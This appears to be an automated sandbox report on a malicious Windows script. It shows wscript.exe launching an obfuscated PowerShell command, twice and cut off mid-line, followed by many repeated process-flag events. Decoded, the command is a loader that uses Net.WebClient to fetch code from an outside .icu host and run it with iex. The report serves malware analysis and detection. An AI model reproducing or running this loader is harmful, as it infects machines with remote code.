              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886D03312 push eax; retf 2_2_00007FF886D03321
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0474191C push es; iretd 5_2_04741923
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04741AF2 push ds; iretd 5_2_04741AF3
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
